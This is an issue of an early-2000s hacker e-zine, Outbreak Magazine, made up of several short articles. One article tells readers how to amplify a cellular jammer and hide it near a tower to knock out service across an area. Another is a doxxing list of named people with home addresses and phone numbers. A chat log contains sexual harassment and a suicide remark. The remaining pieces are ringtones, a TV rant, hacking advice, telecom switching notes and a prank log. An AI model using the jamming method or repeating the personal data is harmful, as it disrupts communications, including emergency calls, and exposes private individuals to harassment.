           ßÛ ÛÛß  °ÛÛÛ   ßÛÛÜ°ÛßÛÛÛÛß±Û    °ÛÛÛß°ÛÜÜÛ²°Û    °Û
              Outbreak Magazine Issue #10 - Article 4 of 18
           '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'


Attack of the cellular towers! By: Coercion
22/09/02

Alright all the concepts in this article are free to write about, so like I
don't really take any credit for it, though I have to give shouts to my friend 
intruder from the Toronto 2600 meets for bringing it into light, alright so 
on to the article!

Basically what you'll need is a cellular disrupter which we here in Canada
can get at our local spy stores, what it does is send out RTS/CTS signals 
meaning that all non-trimode celly's get the message ok shutting off now 
and boom there you go no more cell phones conversations in McDonalds or whatever 
fancy schmancy place you are eating at, now lets take this to the next level,
instead of attacking a 40 meter radius why not take it to a higher level say 
your whole cellular district.

All you'll really need is a 1watt signal amplifier and our device to emit
RTS/CTS signals ;) you get the picture, and if you don't by now lets look at 
this as if we are looking at computers if you DDoS a user's box he will most 
likely be disconnected eventually but if you DDoS the ISP (providing you have the 
capability to) everyone under that ISP gets taken out, so what we do here 
is attack the source in this case being the local cellular tower. So find 
one and start up your contraption with that special amp hooked up to it 
then just stash it somewhere like a tree real close to the tower or somewhere 
where techs wont see it easily and there you go you have just taken down 
a bad ass area! And just in time for dinner too :)

Now the only exception to this system are tri-mode cell's which are in use
almost everywhere in Europe and is pretty much becoming the industry standard 
now, but there are still a lot of people using non-trimode, so hopefully there 
will be someone for you to piss off.

Good Luck with your shit and if you find any concerns with this article or
if everything is completely wrong then.... just change it to however you see
fit and give me some credits for spending some "time" writing this. Shouts to
all my friends! Listing would take too long and you know who you are :)
And always remember safety first, I don't want to see people trying to tap the
power lines of cellular towers and then having their carcasses picked to shit by
crows cause crows are just evil!
                              
                              °Û                       °Û
                          ÞÜ  ±Û                       °Û    °Û
           ÜÛÛ ÛÜ ±Û  ²Û°ÛÛÛÛß°Û ÜÜÜ  ±Û ÜÜ ÜÛÛÛÜ°ÛßßßÛ°Û  °Û
          ÛÛ  ° ÛÛ±Û  ±Û  ÛÛ  ±ÛÛßßßÛܱÛÛßß°ÛÜÜÜß    °Û°ÛÛÛ
          ÛÛ °  ÛÛ±Û  ±Û  ÛÛ  ±Û    °Û±Û   °ÛÜ   °ÜÛßßÛ°Û  °Û
           ßÛ ÛÛß  °ÛÛÛ   ßÛÛÜ°ÛßÛÛÛÛß±Û    °ÛÛÛß°ÛÜÜÛ²°Û    °Û
              Outbreak Magazine Issue #10 - Article 5 of 18
           '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'

Adding Ringtones To Your Nokia Cell Phone
by Lenny

Adding ringtones is real easy to do, if you have a Nokia Cell 
Phone with Composer on it. First press your "Navi" key (the one
you use to get to the games :-) scroll up or down with your scroll
key untill you find Composer, Now you can press the dtmf 
pad to make music. You can save the song and use it for your
ringtone. Here I have included some of my favorite ringtones.


To enter the ringtones below just press the number (or key)

Simpsons Theme

Tempo=160

(hold 1)*, 3, 4#, 68, (hold 5)9, 3, 1, 
68**, 4#, 4#, 4#, 599, 088, 088, 488#,
4#, 4#, 5, (hold 6)9#, 18*, 1, 1, 19 

Sum 41 - In Too Deep

Tempo=125

78, 1*#, 39, 48#, 39, 78**, 1*#, 39, 4#, 
5#, 78**, 4*#, 39, 78**, 4*#, 39, 4#, 5#, 
68, 5#, 3, 4#, 3, 7**, 1*#, 39, 48#, 39, 
78**, 1*#, 39, 4#, 5#, 78**, 4*#, 39, 78**, 
4*#, 39, 4#, 5#, 68, 5#, 3, 4#, 3, 4#, 39 

Star Wars Theme

Tempo=180

48, 4, 4, (hold 6)99#, (hold 4)*, 288#, 2, 1,
(hold 6)99#, (hold 4)8, 28#, 2, 1, (hold 6)
99#, (hold 4)8, 28#, 2, 2#, 199, 08, 488**, 
4, 4, (hold 6)99#, (hold 4)*, 288#, 2, 1, 
(hold 6)99#, (hold 4)8, 28#, 2, 1, (hold 6)
99#, (hold 4)8, 28#, 2, 2#, 199 

Metallica - I Disappear

Tempo=125

(hold 2)#, 4#, (hold 6)9#, 088, 688#, 6#, 69#,
(hold 5)#, 08, 68#, 6#, 69#, 5#, 68#, 5#, 49#,
4#, 28#, (hold 2)9#, 4#, (hold 6)9#, 088, 688#,
6#, 69#, (hold 5)#, 08, 68#, 6#, 69#, 5#, 68#, 
5#, 49#, 4#, 5#, 5#, 6#, 7, 1*#, 2#, 58**#, 
(hold 6)9#, 0, (hold 6)#, 1*#, 18#, 29#, 
(hold 2)#, 1#, 6**#, 59#, 088, 688#, 6#, 69#, 
5#, 68#, 5#, 49#, 4#, (hold 2)# 


Larry (lenny for all of you that dont know)
phreaking812@yahoo.com

I Would like to say hi to Rambox, Gr3p, Jenny, Dropcode, Turbo, Joja Dex, 
Dirv, Kleptic and anyone else i missed 
 
                              °Û                       °Û
                          ÞÜ  ±Û                       °Û    °Û
           ÜÛÛ ÛÜ ±Û  ²Û°ÛÛÛÛß°Û ÜÜÜ  ±Û ÜÜ ÜÛÛÛÜ°ÛßßßÛ°Û  °Û
          ÛÛ  ° ÛÛ±Û  ±Û  ÛÛ  ±ÛÛßßßÛܱÛÛßß°ÛÜÜÜß    °Û°ÛÛÛ
          ÛÛ °  ÛÛ±Û  ±Û  ÛÛ  ±Û    °Û±Û   °ÛÜ   °ÜÛßßÛ°Û  °Û
           ßÛ ÛÛß  °ÛÛÛ   ßÛÛÜ°ÛßÛÛÛÛß±Û    °ÛÛÛß°ÛÜÜÛ²°Û    °Û
              Outbreak Magazine Issue #10 - Article 6 of 18
           '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'


Telephone Directory:
======================
Disclamer: All information in this text file is public information found 
in phone books across the country.  Enjoy.

======================
War/Relapse:
918-241-0433
918-245-9934 (parents)
======================
Mills, Chris(r0cky)
1455 Dorwaldt Blvd   (maybe)apt. 5-2
Schenectady, NY 12308 
518-377-1187

Christopher R Mills   518-377-2548
913 Mason St
Schenectady, NY 12308 

Jennifer Mills   518-374-0520
907 Mason St
Schenectady, NY 12308
======================
Kyle McNeil
661-513-9809
27807 Crookshank Dr
Santa Clarita, CA 91350 
======================
luke traxinger
605-393-0995
======================
Acidchrome
435-647-0838
======================
Nemish
1-847-476-2225
======================
Tom Hagemajer/son_dem0n:  
201 E Pershing Ave
Phoenix, AZ 85022 
Phone: 602-942-8305
======================
Flanigan, Michael
PRINCETON, WV 24740
304-425-7933 

Flanigan, William
204 Forrest St
PRINCETON, WV 24740
304-487-3174 
======================
Blaine Lowwer
410-789-8203
======================


enjoy!!

Love
DoxBot

                              
                              °Û                       °Û
                          ÞÜ  ±Û                       °Û    °Û
           ÜÛÛ ÛÜ ±Û  ²Û°ÛÛÛÛß°Û ÜÜÜ  ±Û ÜÜ ÜÛÛÛÜ°ÛßßßÛ°Û  °Û
          ÛÛ  ° ÛÛ±Û  ±Û  ÛÛ  ±ÛÛßßßÛܱÛÛßß°ÛÜÜÜß    °Û°ÛÛÛ
          ÛÛ °  ÛÛ±Û  ±Û  ÛÛ  ±Û    °Û±Û   °ÛÜ   °ÜÛßßÛ°Û  °Û
           ßÛ ÛÛß  °ÛÛÛ   ßÛÛÜ°ÛßÛÛÛÛß±Û    °ÛÛÛß°ÛÜÜÛ²°Û    °Û
              Outbreak Magazine Issue #10 - Article 7 of 18
           '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'



Session Start: Thu Oct 10 16:20:58 2002
[16:21] <Lexic0n> so you're an emo kid?
[16:21] <emo_kid> what ever could have given you that impression?
[16:21] <Lexic0n> no fucking clue
[16:21] <Lexic0n> i was thinking and thinking
[16:22] <Lexic0n> and i seriously couldn't think of why i wanted to ask you that question
[16:22] <emo_kid> ooh, thinking is never good
[16:22] <Lexic0n> but it just came to me
[16:22] <Lexic0n> kinda like jesus
[16:22] <Lexic0n> does jesus come to you little one?
[16:22] <emo_kid> yes, every day
[16:22] <emo_kid> benji is my jesus *nods*
[16:22] <Lexic0n> benji's good
[16:22] <Lexic0n> he's good
[16:22] <Lexic0n> for shizzle
[16:23] <Lexic0n> what about nancy drew
[16:23] <Lexic0n> you getting enough reading in?
[16:23] * emo_kid shudders at the usage of ebonic-like language
[16:23] <emo_kid> you know it
[16:23] <Lexic0n> hey
[16:23] <Lexic0n> don't diss ebonics
[16:23] <Lexic0n> without it you wouldn't have your stupid emo music
[16:23] <Lexic0n> remember that
[16:23] <emo_kid> *gasp*
[16:23] <emo_kid> i'll ignore that.
[16:24] <emo_kid> quite uncalled for if i do say so myself..
[16:24] <Lexic0n> you really should stop trying to sound so goddamn brilliant
[16:25] <Lexic0n> we all know you're not
[16:25] <emo_kid> ha
[16:25] <Lexic0n> you're just another kid trying to fit in
[16:25] <Lexic0n> so tell me
[16:25] <Lexic0n> do you have a penis or a vagina
[16:25] <emo_kid> fit in where? on irc? riiiight.. i care about what dumbass computer nerds think of me
[16:25] <Lexic0n> apparently you must, after alll
[16:25] <Lexic0n> you are here
[16:25] <Lexic0n> :)
[16:26] <emo_kid> ..and so are you
[16:26] <Lexic0n> i'm always here
[16:26] <Lexic0n> i cry when they hate me
[16:26] <emo_kid> well that's a sad thing to admit, but ok.
[16:26] <Lexic0n> i'm so emo
[16:26] <Lexic0n> penis or vagina 
[16:26] <emo_kid> woo.. vagina all the way.
[16:27] <Lexic0n> i was thinking
[16:27] <Lexic0n> maybe i could come over and finger you 
[16:27] <Lexic0n> we could make out
[16:27] <Lexic0n> and listen to the promise ring
[16:27] <emo_kid> or.. you know.. you could fuck off
[16:28] <Lexic0n> but i love you
[16:28] <Lexic0n> i want to pass you the box of tissues
[16:28] <Lexic0n> and write you poems
[16:28] <Lexic0n> and kiss your sweet pussy
[16:28] <emo_kid> *blinks* that's alright, you have fun with that stick up your ass, bye bye
[16:28] <Lexic0n> wait
[16:28] <Lexic0n> i love you
[16:28] <Lexic0n> honey
[16:28] <Lexic0n> don't leave me again
[16:28] <Lexic0n> i'm so sick of this
[16:29] <Lexic0n> I'LL GIVE YOU BACK YOUR GET UP KIDS CD
[16:29] <Lexic0n> I SWEAR
[16:29] <emo_kid> if you're going to make fun of the music, why are you in the channel?
[16:29] <Lexic0n> i just wanna make love to you underneath the stars
[16:29] <Lexic0n> fuck the music
[16:30] <Lexic0n> the music means nothing
[16:30] <Lexic0n> i'll burn my guitar
[16:30] <Lexic0n> i love you baby
[16:30] <emo_kid> damn.. someone has issues. shoo, fag, don't bother me.
[16:30] <Lexic0n> i love you
[16:30] <Lexic0n> i just want to caress your sweet tits
[16:30] <Lexic0n> and lick your little pink nipples
[16:30] <Lexic0n> come on
[16:30] <Lexic0n> baby
[16:32] <Lexic0n> baby please don't leave me
[16:35] <Lexic0n> FINE YOU WHORE
[16:35] <Lexic0n> GO WITH ROSCOE
[16:35] <Lexic0n> GO WITH HIM
[16:35] <Lexic0n> I HATE YOU
[16:35] <Lexic0n> I HATE YOU BITCH
[16:36] <emo_kid> roscoe gives me what i need, sorry hon.
[16:36] <Lexic0n> YOU WHORE
[16:36] <Lexic0n> YOU DIRTY ROTTEN WHORE
[16:36] <Lexic0n> you will die
[16:36] <Lexic0n> i will kill myself
[16:36] <emo_kid> that's me
[16:36] <Lexic0n> on your front lawn
[16:36] <emo_kid> can't wait
[16:37] <Lexic0n> you said you loved me
[16:37] <Lexic0n> you said you'd never leave me
[16:37] <Lexic0n> my baby cakes
[16:37] <Lexic0n> why do you lie to me
[16:37] <emo_kid> yea well.. that's what alcohol does to you i suppose.
[16:37] <Lexic0n> stop drinking honey
[16:37] <Lexic0n> come home
[16:38] <emo_kid> nah.. i'll be just fine in the trailor park with roscoe.. he treats me good, unlike you, filthy bastard.
[16:39] <Lexic0n> but with my 9 inch penis can't you look past the fact we have to dumpster dive baby?
[16:39] <Lexic0n> i fucked you so good
[16:39] <Lexic0n> so very good
[16:39] <emo_kid> true..
[16:39] <Lexic0n> and i loved you
[16:39] <emo_kid> alright, to hell with roscoe.
[16:39] <Lexic0n> roscoe just can't do that like me
[16:39] <Lexic0n> i love you baby
[16:39] <Lexic0n> don't leave me again
[16:40] <emo_kid> hm you know, i wasn't trying to act 'so damn brilliant' earlier.. dry humor and sarcasm obviously aren't to your liking
[16:41] <Lexic0n> as long as you don't leave me again baby
[16:41] <Lexic0n> you can sarcasm and dry humor all you want
[16:41] <Lexic0n> i'll take it like you take my 9 inches of hot throbbing man meat
[16:42] <emo_kid> hm and how old are you?
[16:48] <Lexic0n> 18 honey
[16:48] <Lexic0n> you knew that
Session Close: Thu Oct 10 17:37:57 2002

 
                              °Û                       °Û
                          ÞÜ  ±Û                       °Û    °Û
           ÜÛÛ ÛÜ ±Û  ²Û°ÛÛÛÛß°Û ÜÜÜ  ±Û ÜÜ ÜÛÛÛÜ°ÛßßßÛ°Û  °Û
          ÛÛ  ° ÛÛ±Û  ±Û  ÛÛ  ±ÛÛßßßÛܱÛÛßß°ÛÜÜÜß    °Û°ÛÛÛ
          ÛÛ °  ÛÛ±Û  ±Û  ÛÛ  ±Û    °Û±Û   °ÛÜ   °ÜÛßßÛ°Û  °Û
           ßÛ ÛÛß  °ÛÛÛ   ßÛÛÜ°ÛßÛÛÛÛß±Û    °ÛÛÛß°ÛÜÜÛ²°Û    °Û
              Outbreak Magazine Issue #10 - Article 8 of 18
           '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'

[curb your enthusiasm]
[by: joja]
[for: outbreak]

For those of you who do not have access to HBO, this small rant really
doesn't matter. Now, we all know that HBO is great to watch most of
your favorite movies, and is one of the(if not THE) best cable channel
on television today. But "HBO Original Programming" is another story.

HBO Original Programming is the fucking bomb diggity! Let's see, we have:
Band of Brothers, a great war series that got amazing ratings, and was
all-around kick ass! Then we have Oz, the prison drama which is filled
with violence, blood, and all that good shit. A real man's show with
many characters some which you may be able to identify with, which makes
it even better.

Six Feet Under, a series about a disfunctional family that runs a funeral
home out of thier house. A great show, somewhat soap opera-like, a lot
of drama which keeps your attention, and pisses you off when the show
is over. I give it two thumbs and an erect penis up!

The Wire. The two-part crime drama. It was simply amazing, I loved it.
You get you taste of life on the streets, drugs, sex and crime. And you
get your taste of the Badass cops fucking shit up. You got to watch it
from both point of views. A definate 3 "thumbs" up.

We all know we can't forget the Sopranos! The Mafia, murder, organized
crime, drugs, conspiracy, and hot chicks!! How can you now love this show?
It's almost to the point where I can't express in words how kick ass it
really is.(Meadow, mmm...)

Ok, here's my rant. My one and only problem with HBO Original Programming.
The 30 minute block of "Curb Your Enthusiasm." This show got ratings such
as "Laughing-out-loud hilarious," and "Maybe the best show ever." I want to
punch whoever rated this show in the head several times. Curb Your Enthusiasm
is
the biggest piece of shit show I've ever watched in my entire life, I say that
with all my heart. You may say "Well, maybe you're missing the humor." No.
I see and get the humor, it just sucks so bad I want to kick my own ass for
not changing the channel.

Now explain to me how a show such as Curb Your Enthusiasim got lined up
with the great shows I mentioned earlier(I forgot RealSex, Shock Video,
and America Undercover; which are also kick ass)? HBO has such a great name
as far as Television is concerned, how could they shit all over us with
Curb Your Enthusiasm? I say the viewers take a vote, a vote to get this puddle
of stagnant babboon urine off my TV Guide.

Overall, Fuck Larry, fuck Curb Your Enthusiasm and Fuck you too HBO, for
having such shitty taste. Yes, It's one bad show out of a lot of great shows.
But give me a break, they stooped too low on this one. I could make a better show
with a camcorder and my family at Christmas time. Curb Your Enthusiasm sucks!
  
                              °Û                       °Û
                          ÞÜ  ±Û                       °Û    °Û
           ÜÛÛ ÛÜ ±Û  ²Û°ÛÛÛÛß°Û ÜÜÜ  ±Û ÜÜ ÜÛÛÛÜ°ÛßßßÛ°Û  °Û
          ÛÛ  ° ÛÛ±Û  ±Û  ÛÛ  ±ÛÛßßßÛܱÛÛßß°ÛÜÜÜß    °Û°ÛÛÛ
          ÛÛ °  ÛÛ±Û  ±Û  ÛÛ  ±Û    °Û±Û   °ÛÜ   °ÜÛßßÛ°Û  °Û
           ßÛ ÛÛß  °ÛÛÛ   ßÛÛÜ°ÛßÛÛÛÛß±Û    °ÛÛÛß°ÛÜÜÛ²°Û    °Û
              Outbreak Magazine Issue #10 - Article 9 of 18
           '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'

IRC - Hacking FAQ
=================
2002-10-05
by Timeless
timeless@hackstation.tk

(the n00b's name was changed to save embarrassment - I'll leave it to you
to figure out which one is the n00b, hehehe)

---<begins>---------------------------------------------------------------------

<SomeNewbie> hey
<Timeless> hiya
<SomeNewbie> what does this channel do?
<SomeNewbie> teach?
<Timeless> it holds intelligence, so maybe it could teach I suppose
<SomeNewbie> well i want to learn
<Timeless> you are not the only one, even elite hackers constantly try to
           learn more
<SomeNewbie> hehe
<Timeless> today's hack is tomorrow's patch
<SomeNewbie> well im a newbe
<Timeless> you have many years to go
<SomeNewbie> hehe
<SomeNewbie> well we all have to start some were right
<Timeless> yes, but there is pain involved
<SomeNewbie> hehe
<Timeless> do you write programs?
<SomeNewbie> im learning
<Timeless> good, learn more
<Timeless> all languages
<SomeNewbie> i know some c++
<SomeNewbie> and i learned pascal
<SomeNewbie> but thats kindof i useless
<Timeless> learn some assembly
<Timeless> :)
<Timeless> to give you an idea of some real hacking, check out the tutorials
           on buffer and stack overflows on this page: www.roothack.org
<Timeless> the links are on the right
<SomeNewbie> i c
<Timeless> there are some nice debugger tips in there too
<SomeNewbie> so this can do it?
<Timeless> it's a start
<Timeless> "it" is never done
<SomeNewbie> hehe tru
<SomeNewbie> what will this site teach?
<Timeless> it will hopefully help you to understand good coding practices
<SomeNewbie> kool
<Timeless> by knowing the flaws you can write good strong code
<SomeNewbie> do i apply for the game?
<Timeless> heh, the game is way too advanced
<Timeless> don't bother with the game yet
<SomeNewbie> o lol
<Timeless> do you run Linux?
<SomeNewbie> ok ill just read up on it then
<Timeless> k
<SomeNewbie> i run a xp
<SomeNewbie> adn a mac
<Timeless> Jaguar?
<SomeNewbie> yup
<Timeless> kewl
<Timeless> under the hood is like BSD
<Timeless> a type of Unix
<Timeless> get your hands dirty
<SomeNewbie> hehe
<Timeless> also get a spare box up and try running RedHat Linux
<Timeless> setup firewalls, web servers, etc.
<SomeNewbie> i tried that 1ce
<Timeless> kewl
<Timeless> try it more
<SomeNewbie> i dont like it much
<SomeNewbie> i couldnt even get on the internet
<SomeNewbie> hehe
<Timeless> the more you expose yourself to this kind of stuff the more likely
           you are to get an instinct for it
<Timeless> make some dynamic web sites, try see the related security issues
<SomeNewbie> ok
<SomeNewbie> ill check it out
<Timeless> examine the various network protocols
<Timeless> get a feel for what is going on behind the scenes
<SomeNewbie> right
<Timeless> see how quickly that got like really big?!
<Timeless> lots to do
<SomeNewbie> ya lol
<Timeless> hope you're young
<Timeless> :)
<SomeNewbie> hehe
<Timeless> ... it will take half your life to become a well-rounded elite
           hacker/cracker etc.
<SomeNewbie> wow
<SomeNewbie> i thought u just learn it
<SomeNewbie> like reading a book
<SomeNewbie> lolol
<Timeless> um, no, unfortunately
<Timeless> hehe
<Timeless> I wish
<SomeNewbie> ya
<Timeless> considering many things change
<SomeNewbie> that would be nice
<Timeless> at a rapid rate
<SomeNewbie> tru
<Timeless> which is why the instinct thing is important
<Timeless> what's your profession?
<SomeNewbie> im in school
<Timeless> ok
<Timeless> anyone else you know that likes the same kind of thing? (hacking)
<SomeNewbie> not really
<Timeless> yeah, me neither
<SomeNewbie> hehe
<SomeNewbie> what kind of stuff can u do ?
<SomeNewbie> like hacking
<Timeless> I'm too far gone now, people I know wouldn't understand even the
           simplest of things I have to talk about
<SomeNewbie> lol
<Timeless> well, I've done all kinds of things
<SomeNewbie> how long did it take u to learn?
<Timeless> I am a professional programmer and I worked for an ISP
<Timeless> started in 1985
<SomeNewbie> damn
<SomeNewbie> been around for a while
<Timeless> yep
<SomeNewbie> what do u think about LINdows
<Timeless> not checked it out yet
<Timeless> what do you think of it?
<SomeNewbie> heard ne thing interesting?
<SomeNewbie> havent tried it either
<Timeless> I have heard the odd thing that assures me it exists
<SomeNewbie> i c
<SomeNewbie> it supposedly can run linux and windows progrmas?
<Timeless> other Linuxes run Windows apps using "wine"
<Timeless> wine stands for: Wine Is Not an Emulator
<Timeless> hehe
<Timeless> although, you can run something like bochs if you want to emulate
           another PC on your current PC
<Timeless> bochs can be found on Sourceforge
<SomeNewbie> hmm
<SomeNewbie> i need to learn to use linux to hakc?
<Timeless> you need to expose yourself to many OS'es
<Timeless> a lot of serious web hosting companies use RedHat Linux
<SomeNewbie> what os u use?
<Timeless> heh, I have XP as workstation, RH Linux as firewall/gateway, my
           other boxes have Debian Linux and Windows 2000
<SomeNewbie> Debian
<SomeNewbie> whats that?
<Timeless> I can also configure Cisco routers
<Timeless> Debian is yet another Linux distro
<SomeNewbie> damn
<SomeNewbie> im taking a cisco class
<Timeless> good
<Timeless> I don't get to use Solaris much these days
<Timeless> I can't be arsed to buy the hardware
<Timeless> am saving up for my first Mac (well, first one for home use anyway)
<SomeNewbie> ya
<SomeNewbie> i love my mac
<SomeNewbie> it can do so much crap
<Timeless> and one day I want to continue playing around with MPLCs
<Timeless> and I want a mini-PC
<Timeless> hehe
<SomeNewbie> i got me a dell laptop
<Timeless> me too
<SomeNewbie> and a dual 1.4 gig g4
<Timeless> it's a bit old tho
<Timeless> I like the G4, can't afford one tho
<SomeNewbie> mine about 1 year
<SomeNewbie> 1ghz
<SomeNewbie> ya i had to save for 2 years
<Timeless> well done dude
<Timeless> impressive
<SomeNewbie> hehe
<Timeless> one more thing, and this is just me I'm speaking for... I make
           of rule of never hacking out in the wild.
<SomeNewbie> meaning?
<Timeless> meaning I won't go hacking for fun
<SomeNewbie> then y else would u hack?
<Timeless> unless the company pays me to do it to themselves
<Timeless> and I have a written contract
<SomeNewbie> well,,,
<SomeNewbie> lol
<Timeless> I hack my own computers to learn
<SomeNewbie> LOL
<Timeless> I have no motive to hack anyone
<SomeNewbie> nicely put
<Timeless> ... yet :)
<SomeNewbie> hehe
<SomeNewbie> let see......
<Timeless> lol
<SomeNewbie> could u get into my computer right now?
<Timeless> dunno
<Timeless> maybe
<SomeNewbie> it will prob be extremy easy
* Timeless shrugs
<SomeNewbie> hehe
<Timeless> :)
<Timeless> there was a competition/honey pot running recently, XP Home box,
           default install connected to the net
<Timeless> I don't think it was broken into
<Timeless> it's when the user starts doing stupid things that makes it easier
<SomeNewbie> hehe
<Timeless> or if services are open to buffer overflows etc.
<SomeNewbie> kool
<Timeless> a buffer overflow is basically a way of getting some pre-prepared
           code of mine to run on your machine, which would in turn download a back
           door program for me to have a more advanced interaction with your computer
<SomeNewbie> thats awsome
<Timeless> some buffer overflows can take ages to create once you find a
           flaw in the software that can be abused
<SomeNewbie> thats y u need to be a programer
<Timeless> it's sometimes easier to send you a trojan, or get you to view
           a web site that exploits other known flaws in your web browser for 
           example
<Timeless> yes, exactly!
<Timeless> being a programmer makes sure that you understand what you are
           doing
<SomeNewbie> thats pretty awsome
<Timeless> having worked at an ISP, I also understand how traceable you are
           too :)
<SomeNewbie> so before i try to start ne thing i should learn more programming
<Timeless> yes
<SomeNewbie> what isp u work for?
<Timeless> I used to work for www.********.co.zw - Zimbabwe's leading ISP,
           but then I moved to the UK
<SomeNewbie> u lived in Zimbabwe?
<Timeless> I used to catch hackers in the act, then make them aware I knew
           what they were doing, scare them a bit, then befriend them - they never 
           attempted to hack my servers again after that
<Timeless> it was great
<SomeNewbie> hehe
<SomeNewbie> sounds awsome
<Timeless> having an understanding of web servers and buffer overflows helped
           me prevent my web servers from being vulnerable to the code red worm -
           simply use an application-level firewall, like SecureIIS for example on
           the web server
<Timeless> I also write web applications
<Timeless> so understanding the HTTP protocol and anything web-related also
           helps a lot
<SomeNewbie> damn
<SomeNewbie> u know everything
<Timeless> no way!
<Timeless> I don't
<Timeless> I found the more I learn the less I feel I know
<Timeless> there is just too much to learn
<Timeless> eventually you find you will specialise in various areas of the
           art that you like
<SomeNewbie> tru
<Timeless> I used to crack software - ie. remove 30-day expiry etc. for fun
           (never to distribute on the net though - bearing in mind my first rule)
<SomeNewbie> kool'
<Timeless> but that gets a bit boring
<Timeless> so I stopped doing it
<SomeNewbie> ya?
<Timeless> besides, all my software is properly paid for now
<SomeNewbie> hehe
<SomeNewbie> so what do u do int this channel?>
<Timeless> I chat if anyone wants to chat, give and take advice, etc., most
   people idle here
<Timeless> everyone likes to stereotype hackers - I'm just curious, and like
   computers, but I am also a very responsible person

---<ends>-----------------------------------------------------------------------                              
			      °Û                       °Û
                          ÞÜ  ±Û                       °Û    °Û
           ÜÛÛ ÛÜ ±Û  ²Û°ÛÛÛÛß°Û ÜÜÜ  ±Û ÜÜ ÜÛÛÛÜ°ÛßßßÛ°Û  °Û
          ÛÛ  ° ÛÛ±Û  ±Û  ÛÛ  ±ÛÛßßßÛܱÛÛßß°ÛÜÜÜß    °Û°ÛÛÛ
          ÛÛ °  ÛÛ±Û  ±Û  ÛÛ  ±Û    °Û±Û   °ÛÜ   °ÜÛßßÛ°Û  °Û
           ßÛ ÛÛß  °ÛÛÛ   ßÛÛÜ°ÛßÛÛÛÛß±Û    °ÛÛÛß°ÛÜÜÛ²°Û    °Û
              Outbreak Magazine Issue #10 - Article 10 of 18
           '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'

Specialized Common Carrier Service (SCCS)
contibuted by Adeamis

The DMS-250 Specialized Common Carrier Service (SCCS) provides the capability
of Analog to Digital (A/D) and Digital to Analog (D/A) conversions which are
necessary with analog circuits.  The DMS-250 can also switch voice and data
circuits.

The DMS-250 takes either analog or digitally encoded info and by using time
slot interchange, switches it from any input port to a temporary addressed and
connected exit port.  The info may or may not be converted back to analog.

Cellular Mobile Radio Service

A cellular system consists of two main parts:  a cellular switch and cell site
equipment.


Cellular Switching Systems

A cellular switch performs three main functions:  audio switching, cell site
control, and system administration.

The DMS switches provide three basic implementations for cellular switching:
Stand-alone, Combined, and Remote.

Stand-alone switching is done by a Mobile Telephone Exchange (MTX) which is
interfaced with one or more class 5 end offices.  The connection is made by
DID/DOD trunks.  Depending on the needs of the area, the MTX can be divided as
follows:  MTX which serves urban areas, MTXC which handles suburban areas, and
MTXM which is used for rural areas.

Combined switching is incorporated into a DMS-100 by some hardware additions
and cellular software.  Combined switching is designed to give an easy,
cost-effective way to install cellular services to an existing host.

Remote Switching is done by combining Remote Switching Center (RSC) with a
Cell Site Controller (CSC).  This combination is hosted by either a
stand-alone or a combined switch.  Remote Switching is designed for serving
suburban centers, remote areas, or a small community and it gives extra
flexibility for a growing system.

All of these cellular switches have the ability to balance the workload among
various cell sites.  For example, if one site's workload reaches the
programmable level of congestion, calls would be routed to nearby sites that
can handle the extra calls.


Cell Site Equipment

Cell site equipment consists of a CSC and radio equipment.  The CSC is
controlled by the cellular switch and it controls radio equipment and
maintenance tasks.  The CSC will work on any MTX cellular switch because of
the Remote Cluster Controller (RCC).

The radio equipment consists of self-contained Radio Channel Units (RCU),
antennas, transmitter multi-couplers, and receiver combiners.

By different program software, an RCU can perform voice, control locating, and
test functions.  The self contained nature allows the RCU be remotely located
to the CSC.  A RCU has built-in circuitry for extended testing of the radio
part of the system.



Cellular switching i didnt write it
                              °Û                       °Û
                          ÞÜ  ±Û                       °Û    °Û
           ÜÛÛ ÛÜ ±Û  ²Û°ÛÛÛÛß°Û ÜÜÜ  ±Û ÜÜ ÜÛÛÛÜ°ÛßßßÛ°Û  °Û
          ÛÛ  ° ÛÛ±Û  ±Û  ÛÛ  ±ÛÛßßßÛܱÛÛßß°ÛÜÜÜß    °Û°ÛÛÛ
          ÛÛ °  ÛÛ±Û  ±Û  ÛÛ  ±Û    °Û±Û   °ÛÜ   °ÜÛßßÛ°Û  °Û
           ßÛ ÛÛß  °ÛÛÛ   ßÛÛÜ°ÛßÛÛÛÛß±Û    °ÛÛÛß°ÛÜÜÛ²°Û    °Û
              Outbreak Magazine Issue #10 - Article 11 of 18
           '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'

Pac Man Ninja
=============
by: kleptic <kleptic@grex.org>
http://www.kleptic.tk
AIM - kl3ptic
=============


kl3ptic: Blaine.. my man. 
 
kl3ptic: whats going down?

KoNkReTeEleMeNt: who is this

kl3ptic: Nick you silly bastard

kl3ptic: heh

kl3ptic: whats up?

KoNkReTeEleMeNt: well then why did u im me on the other name

kl3ptic: cause im an elite ninja.. why else?

kl3ptic: dont be a dipshit blaine.   

kl3ptic: say

kl3ptic: we getting together this weekend?

kl3ptic: to party like a mother fucker?

KoNkReTeEleMeNt: who is this 

kl3ptic: i just told you .. did you get your head beat in as a 4 year old?

kl3ptic: its fucking Nick

kl3ptic: mullet and all dude

KoNkReTeEleMeNt: nick who 

kl3ptic: what do you mean nick who?

kl3ptic: quit being a dick

kl3ptic: hey, i got pac man arcade classic dude

kl3ptic: you in?

kl3ptic: its the shit

kl3ptic: not that fucking mrs. pac man bull

kl3ptic: all out PAC MAN

kl3ptic: you down with this shit?

KoNkReTeEleMeNt: nick that hangs out with andrew

kl3ptic: c'mon Blaine.. don't be a pansy ass.

kl3ptic: Pac Man Blaine

kl3ptic: Pac to the mother fucking Man

KoNkReTeEleMeNt: u quit fucking with me yo 

KoNkReTeEleMeNt: who to the mother fuck is this

kl3ptic: DUDE.  I'm not fucking with you..  

kl3ptic: Are you scared of my pac man ninja skills Blaine?

kl3ptic: You think you can take me in Pac Man?

kl3ptic: Oh OH! I think not my friend!

KoNkReTeEleMeNt: dude get a life

kl3ptic: hey dude.  If you're scared. That's cool.

